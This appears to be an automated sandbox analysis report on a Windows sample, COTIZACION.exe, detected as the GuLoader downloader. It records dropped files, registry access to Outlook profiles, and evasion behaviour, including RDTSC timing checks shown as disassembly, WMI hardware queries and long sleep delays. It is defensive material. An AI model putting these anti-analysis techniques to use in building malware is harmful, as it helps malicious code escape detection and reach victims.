Source: C:\Users\user\Desktop\COTIZACION.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\COTIZACION.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\COTIZACION.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\COTIZACION.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\COTIZACION.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\COTIZACION.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\COTIZACION.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\COTIZACION.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\COTIZACION.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\COTIZACION.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\COTIZACION.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\COTIZACION.exe	Section loaded: edputil.dll	Jump to behavior

Source: C:\Users\user\Desktop\COTIZACION.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\COTIZACION.exe

File written: C:\Users\user\Music\antithetic.ini

Jump to behavior

Source: C:\Users\user\Desktop\COTIZACION.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\Profiles

Jump to behavior

Source: COTIZACION.exe

Static file information: File size 1206384 > 1048576

Source: COTIZACION.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Data Obfuscation

Yara detected GuLoader

Source: Yara match

File source: 00000000.00000002.2000502828.0000000006398000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\COTIZACION.exe

Code function: 0_2_70022351 GlobalFree,GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,

0_2_70022351

Source: C:\Users\user\Desktop\COTIZACION.exe	Code function: 5_2_00150C55 push ebx; retf	5_2_00150C52
Source: C:\Users\user\Desktop\COTIZACION.exe	Code function: 5_2_00150C55 push edi; retf	5_2_00150C7A
Source: C:\Users\user\Desktop\COTIZACION.exe	Code function: 5_2_00156F0F push edx; iretd	5_2_00156F11
Source: C:\Users\user\Desktop\COTIZACION.exe	Code function: 5_2_3B7176D8 push esp; iretd	5_2_3B7176E9

Source: C:\Users\user\Desktop\COTIZACION.exe

File created: C:\Users\user\AppData\Local\Temp\nszA7D1.tmp\System.dll

Jump to dropped file

Source: C:\Users\user\Desktop\COTIZACION.exe

Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot

Jump to behavior

Source: C:\Users\user\Desktop\COTIZACION.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\COTIZACION.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\COTIZACION.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\COTIZACION.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\COTIZACION.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\COTIZACION.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\COTIZACION.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\COTIZACION.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\COTIZACION.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\COTIZACION.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\COTIZACION.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\COTIZACION.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\COTIZACION.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\COTIZACION.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\COTIZACION.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\COTIZACION.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\COTIZACION.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\COTIZACION.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\COTIZACION.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\COTIZACION.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\COTIZACION.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\COTIZACION.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\COTIZACION.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\COTIZACION.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\COTIZACION.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\COTIZACION.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\COTIZACION.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\COTIZACION.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\COTIZACION.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\COTIZACION.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\COTIZACION.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\COTIZACION.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\COTIZACION.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\COTIZACION.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\COTIZACION.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\COTIZACION.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\COTIZACION.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\COTIZACION.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\COTIZACION.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\COTIZACION.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\COTIZACION.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\COTIZACION.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\COTIZACION.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\COTIZACION.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\COTIZACION.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\COTIZACION.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\COTIZACION.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\COTIZACION.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\COTIZACION.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\COTIZACION.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\COTIZACION.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\COTIZACION.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\COTIZACION.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\COTIZACION.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\COTIZACION.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\COTIZACION.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\COTIZACION.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\COTIZACION.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\COTIZACION.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\COTIZACION.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\COTIZACION.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\COTIZACION.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\COTIZACION.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\COTIZACION.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\COTIZACION.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\COTIZACION.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Source: C:\Users\user\Desktop\COTIZACION.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\Desktop\COTIZACION.exe	API/Special instruction interceptor: Address: 69A4575
Source: C:\Users\user\Desktop\COTIZACION.exe	API/Special instruction interceptor: Address: 3664575

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\COTIZACION.exe	RDTSC instruction interceptor: First address: 694AE5F second address: 694AE5F instructions: 0x00000000 rdtsc 0x00000002 test ch, ah 0x00000004 test esi, 01E8FF30h 0x0000000a cmp ebx, ecx 0x0000000c jc 00007F6AF0D0C9FFh 0x0000000e inc ebp 0x0000000f cmp bx, dx 0x00000012 inc ebx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\COTIZACION.exe	RDTSC instruction interceptor: First address: 360AE5F second address: 360AE5F instructions: 0x00000000 rdtsc 0x00000002 test ch, ah 0x00000004 test esi, 01E8FF30h 0x0000000a cmp ebx, ecx 0x0000000c jc 00007F6AF0C9A9EFh 0x0000000e inc ebp 0x0000000f cmp bx, dx 0x00000012 inc ebx 0x00000013 rdtsc

Source: C:\Users\user\Desktop\COTIZACION.exe	Memory allocated: 110000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\COTIZACION.exe	Memory allocated: 382B0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\COTIZACION.exe	Memory allocated: 38090000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\COTIZACION.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\COTIZACION.exe	Thread delayed: delay time: 1200000	Jump to behavior
Source: C:\Users\user\Desktop\COTIZACION.exe	Thread delayed: delay time: 1199890	Jump to behavior
Source: C:\Users\user\Desktop\COTIZACION.exe	Thread delayed: delay time: 1199781	Jump to behavior
Source: C:\Users\user\Desktop\COTIZACION.exe	Thread delayed: delay time: 1199672	Jump to behavior
Source: C:\Users\user\Desktop\COTIZACION.exe	Thread delayed: delay time: 1199562	Jump to behavior
Source: C:\Users\user\Desktop\COTIZACION.exe	Thread delayed: delay time: 1199453	Jump to behavior
Source: C:\Users\user\Desktop\COTIZACION.exe	Thread delayed: delay time: 1199344	Jump to behavior
Source: C:\Users\user\Desktop\COTIZACION.exe	Thread delayed: delay time: 1199234	Jump to behavior
Source: C:\Users\user\Desktop\COTIZACION.exe	Thread delayed: delay time: 1199125	Jump to behavior
Source: C:\Users\user\Desktop\COTIZACION.exe	Thread delayed: delay time: 1199015	Jump to behavior
Source: C:\Users\user\Desktop\COTIZACION.exe	Thread delayed: delay time: 1198906	Jump to behavior
Source: C:\Users\user\Desktop\COTIZACION.exe	Thread delayed: delay time: 1198797	Jump to behavior
Source: C:\Users\user\Desktop\COTIZACION.exe	Thread delayed: delay time: 1198687	Jump to behavior
Source: C:\Users\user\Desktop\COTIZACION.exe	Thread delayed: delay time: 1198577	Jump to behavior
Source: C:\Users\user\Desktop\COTIZACION.exe	Thread delayed: delay time: 1198469	Jump to behavior
Source: C:\Users\user\Desktop\COTIZACION.exe	Thread delayed: delay time: 1198356	Jump to behavior
Source: C:\Users\user\Desktop\COTIZACION.exe	Thread delayed: delay time: 1198250	Jump to behavior
Source: C:\Users\user\Desktop\COTIZACION.exe	Thread delayed: delay time: 1198140	Jump to behavior
Source: C:\Users\user\Desktop\COTIZACION.exe	Thread delayed: delay time: 1198031	Jump to behavior
Source: C:\Users\user\Desktop\COTIZACION.exe	Thread delayed: delay time: 1197922	Jump to behavior
Source: C:\Users\user\Desktop\COTIZACION.exe	Thread delayed: delay time: 1197812	Jump to behavior
Source: C:\Users\user\Desktop\COTIZACION.exe	Thread delayed: delay time: 1197703	Jump to behavior
Source: C:\Users\user\Desktop\COTIZACION.exe	Thread delayed: delay time: 1197593	Jump to behavior
Source: C:\Users\user\Desktop\COTIZACION.exe	Thread delayed: delay time: 1197484	Jump to behavior
Source: C:\Users\user\Desktop\COTIZACION.exe	Thread delayed: delay time: 1197375	Jump to behavior
Source: C:\Users\user\Desktop\COTIZACION.exe	Thread delayed: delay time: 1197265	Jump to behavior

Source: C:\Users\user\Desktop\COTIZACION.exe	Window / User API: threadDelayed 2473			Jump to behavior
Source: C:\Users\user\Desktop\COTIZACION.exe	Window / User API: threadDelayed 7379			Jump to behavior

Source: C:\Users\user\Desktop\COTIZACION.exe

Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nszA7D1.tmp\System.dll

Jump to dropped file

Source: C:\Users\user\Desktop\COTIZACION.exe

Evaded block: after key decision

graph_0-3127

Source: C:\Users\user\Desktop\COTIZACION.exe TID: 8088	Thread sleep time: -27670116110564310s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\COTIZACION.exe TID: 8088	Thread sleep time: -100000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\COTIZACION.exe TID: 8096	Thread sleep count: 2473 > 30	Jump to behavior
Source: C:\Users\user\Desktop\COTIZACION.exe TID: 8088	Thread sleep time: -99859s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\COTIZACION.exe TID: 8096	Thread sleep count: 7379 > 30	Jump to behavior
Source: C:\Users\user\Desktop\COTIZACION.exe TID: 8088	Thread sleep time: -99733s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\COTIZACION.exe TID: 8088	Thread sleep time: -99609s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\COTIZACION.exe TID: 8088	Thread sleep time: -99500s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\COTIZACION.exe TID: 8088	Thread sleep time: -99390s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\COTIZACION.exe TID: 8088	Thread sleep time: -99280s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\COTIZACION.exe TID: 8088	Thread sleep time: -99156s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\COTIZACION.exe TID: 8088	Thread sleep time: -99047s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\COTIZACION.exe TID: 8088	Thread sleep time: -98937s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\COTIZACION.exe TID: 8088	Thread sleep time: -98828s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\COTIZACION.exe TID: 8088	Thread sleep time: -98717s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\COTIZACION.exe TID: 8088	Thread sleep time: -98609s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\COTIZACION.exe TID: 8088	Thread sleep time: -98500s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\COTIZACION.exe TID: 8088	Thread sleep time: -98390s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\COTIZACION.exe TID: 8088	Thread sleep time: -98281s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\COTIZACION.exe TID: 8088	Thread sleep time: -98167s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\COTIZACION.exe TID: 8088	Thread sleep time: -98062s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\COTIZACION.exe TID: 8088	Thread sleep time: -97953s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\COTIZACION.exe TID: 8088	Thread sleep time: -97843s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\COTIZACION.exe TID: 8088	Thread sleep time: -97637s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\COTIZACION.exe TID: 8088	Thread sleep time: -97531s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\COTIZACION.exe TID: 8088	Thread sleep time: -97421s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\COTIZACION.exe TID: 8088	Thread sleep time: -97310s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\COTIZACION.exe TID: 8088	Thread sleep time: -1200000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\COTIZACION.exe TID: 8088	Thread sleep time: -1199890s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\COTIZACION.exe TID: 8088	Thread sleep time: -1199781s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\COTIZACION.exe TID: 8088	Thread sleep time: -1199672s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\COTIZACION.exe TID: 8088	Thread sleep time: -1199562s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\COTIZACION.exe TID: 8088	Thread sleep time: -1199453s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\COTIZACION.exe TID: 8088	Thread sleep time: -1199344s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\COTIZACION.exe TID: 8088	Thread sleep time: -1199234s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\COTIZACION.exe TID: 8088	Thread sleep time: -1199125s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\COTIZACION.exe TID: 8088	Thread sleep time: -1199015s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\COTIZACION.exe TID: 8088	Thread sleep time: -1198906s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\COTIZACION.exe TID: 8088	Thread sleep time: -1198797s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\COTIZACION.exe TID: 8088	Thread sleep time: -1198687s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\COTIZACION.exe TID: 8088	Thread sleep time: -1198577s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\COTIZACION.exe TID: 8088	Thread sleep time: -1198469s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\COTIZACION.exe TID: 8088	Thread sleep time: -1198356s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\COTIZACION.exe TID: 8088	Thread sleep time: -1198250s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\COTIZACION.exe TID: 8088	Thread sleep time: -1198140s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\COTIZACION.exe TID: 8088	Thread sleep time: -1198031s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\COTIZACION.exe TID: 8088	Thread sleep time: -1197922s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\COTIZACION.exe TID: 8088	Thread sleep time: -1197812s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\COTIZACION.exe TID: 8088	Thread sleep time: -1197703s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\COTIZACION.exe TID: 8088	Thread sleep time: -1197593s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\COTIZACION.exe TID: 8088	Thread sleep time: -1197484s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\COTIZACION.exe TID: 8088	Thread sleep time: -1197375s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\COTIZACION.exe TID: 8088	Thread sleep time: -1197265s >= -30000s	Jump to behavior

Source: C:\Users\user\Desktop\COTIZACION.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard

Source: C:\Users\user\Desktop\COTIZACION.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\Desktop\COTIZACION.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\Desktop\COTIZACION.exe	Last function: Thread delayed
Source: C:\Users\user\Desktop\COTIZACION.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\COTIZACION.exe	Code function: 0_2_004066F7 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,		0_2_004066F7
Source: C:\Users\user\Desktop\COTIZACION.exe	Code function: 0_2_004065AD FindFirstFileW,FindClose,		0_2_004065AD

Source: C:\Users\user\Desktop\COTIZACION.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\COTIZACION.exe	Thread delayed: delay time: 100000	Jump to behavior
Source: C:\Users\user\Desktop\COTIZACION.exe	Thread delayed: delay time: 99859	Jump to behavior
Source: C:\Users\user\Desktop\COTIZACION.exe	Thread delayed: delay time: 99733	Jump to behavior
Source: C:\Users\user\Desktop\COTIZACION.exe	Thread delayed: delay time: 99609	Jump to behavior
Source: C:\Users\user\Desktop\COTIZACION.exe	Thread delayed: delay time: 99500	Jump to behavior
Source: C:\Users\user\Desktop\COTIZACION.exe	Thread delayed: delay time: 99390	Jump to behavior
Source: C:\Users\user\Desktop\COTIZACION.exe	Thread delayed: delay time: 99280	Jump to behavior
Source: C:\Users\user\Desktop\COTIZACION.exe	Thread delayed: delay time: 99156	Jump to behavior
Source: C:\Users\user\Desktop\COTIZACION.exe	Thread delayed: delay time: 99047	Jump to behavior
Source: C:\Users\user\Desktop\COTIZACION.exe	Thread delayed: delay time: 98937	Jump to behavior
Source: C:\Users\user\Desktop\COTIZACION.exe	Thread delayed: delay time: 98828	Jump to behavior
Source: C:\Users\user\Desktop\COTIZACION.exe	Thread delayed: delay time: 98717	Jump to behavior
Source: C:\Users\user\Desktop\COTIZACION.exe	Thread delayed: delay time: 98609	Jump to behavior
Source: C:\Users\user\Desktop\COTIZACION.exe	Thread delayed: delay time: 98500	Jump to behavior
Source: C:\Users\user\Desktop\COTIZACION.exe	Thread delayed: delay time: 98390	Jump to behavior
Source: C:\Users\user\Desktop\COTIZACION.exe	Thread delayed: delay time: 98281	Jump to behavior
Source: C:\Users\user\Desktop\COTIZACION.exe	Thread delayed: delay time: 98167	Jump to behavior
Source: C:\Users\user\Desktop\COTIZACION.exe	Thread delayed: delay time: 98062	Jump to behavior
Source: C:\Users\user\Desktop\COTIZACION.exe	Thread delayed: delay time: 97953	Jump to behavior
Source: C:\Users\user\Desktop\COTIZACION.exe	Thread delayed: delay time: 97843	Jump to behavior
Source: C:\Users\user\Desktop\COTIZACION.exe	Thread delayed: delay time: 97637	Jump to behavior
Source: C:\Users\user\Desktop\COTIZACION.exe	Thread delayed: delay time: 97531	Jump to behavior
Source: C:\Users\user\Desktop\COTIZACION.exe	Thread delayed: delay time: 97421	Jump to behavior
Source: C:\Users\user\Desktop\COTIZACION.exe	Thread delayed: delay time: 97310	Jump to behavior
Source: C:\Users\user\Desktop\COTIZACION.exe	Thread delayed: delay time: 1200000	Jump to behavior
Source: C:\Users\user\Desktop\COTIZACION.exe	Thread delayed: delay time: 1199890	Jump to behavior
Source: C:\Users\user\Desktop\COTIZACION.exe	Thread delayed: delay time: 1199781	Jump to behavior
Source: C:\Users\user\Desktop\COTIZACION.exe	Thread delayed: delay time: 1199672	Jump to behavior
Source: C:\Users\user\Desktop\COTIZACION.exe	Thread delayed: delay time: 1199562	Jump to behavior
Source: C:\Users\user\Desktop\COTIZACION.exe	Thread delayed: delay time: 1199453	Jump to behavior
Source: C:\Users\user\Desktop\COTIZACION.exe	Thread delayed: delay time: 1199344	Jump to behavior
Source: C:\Users\user\Desktop\COTIZACION.exe	Thread delayed: delay time: 1199234	Jump to behavior
Source: C:\Users\user\Desktop\COTIZACION.exe	Thread delayed: delay time: 1199125	Jump to behavior
Source: C:\Users\user\Desktop\COTIZACION.exe	Thread delayed: delay time: 1199015	Jump to behavior
Source: C:\Users\user\Desktop\COTIZACION.exe	Thread delayed: delay time: 1198906	Jump to behavior
Source: C:\Users\user\Desktop\COTIZACION.exe	Thread delayed: delay time: 1198797	Jump to behavior
Source: C:\Users\user\Desktop\COTIZACION.exe	Thread delayed: delay time: 1198687	Jump to behavior
Source: C:\Users\user\Desktop\COTIZACION.exe	Thread delayed: delay time: 1198577	Jump to behavior
Source: C:\Users\user\Desktop\COTIZACION.exe	Thread delayed: delay time: 1198469	Jump to behavior
Source: C:\Users\user\Desktop\COTIZACION.exe	Thread delayed: delay time: 1198356	Jump to behavior
Source: C:\Users\user\Desktop\COTIZACION.exe	Thread delayed: delay time: 1198250	Jump to behavior
Source: C:\Users\user\Desktop\COTIZACION.exe	Thread delayed: delay time: 1198140	Jump to behavior
Source: C:\Users\user\Desktop\COTIZACION.exe	Thread delayed: delay time: 1198031	Jump to behavior
Source: C:\Users\user\Desktop\COTIZACION.exe	Thread delayed: delay time: 1197922	Jump to behavior
Source: C:\Users\user\Desktop\COTIZACION.exe	Thread delayed: delay time: 1197812	Jump to behavior
Source: C:\Users\user\Desktop\COTIZACION.exe	Thread delayed: delay time: 1197703	Jump to behavior
Source: C:\Users\user\Desktop\COTIZACION.exe	Thread delayed: delay time: 1197593	Jump to behavior
Source: C:\Users\user\Desktop\COTIZACION.exe	Thread delayed: delay time: 1197484	Jump to behavior
Source: C:\Users\user\Desktop\COTIZACION.exe	Thread delayed: delay time: 1197375	Jump to behavior
Source: C:\Users\user\Desktop\COTIZACION.exe	Thread delayed: delay time: 1197265	Jump to behavior

Source: COTIZACION.exe, 00000005.00000002.2578600930.0000000007CAC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW'k:
Source: COTIZACION.exe, 00000005.00000002.2578600930.0000000007C48000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWP
Source: COTIZACION.exe, 00000005.00000002.2578600930.0000000007CAC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW

Source: C:\Users\user\Desktop\COTIZACION.exe

API call chain: ExitProcess graph end node

graph_0-3016

Source: C:\Users\user\Desktop\COTIZACION.exe

Code function: 0_2_70022351 GlobalFree,GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,

0_2_70022351

Source: C:\Users\user\Desktop\COTIZACION.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\Desktop\COTIZACION.exe

Memory allocated: page read and write | page guard

Jump to behavior

Source: C:\Users\user\Desktop\COTIZACION.exe

Process created: C:\Users\user\Desktop\COTIZACION.exe "C:\Users\user\Desktop\COTIZACION.exe"

Jump to behavior

Source: C:\Users\user\Desktop\COTIZACION.exe	Queries volume information: C:\Users\user\Desktop\COTIZACION.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COTIZACION.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COTIZACION.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COTIZACION.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COTIZACION.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COTIZACION.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior

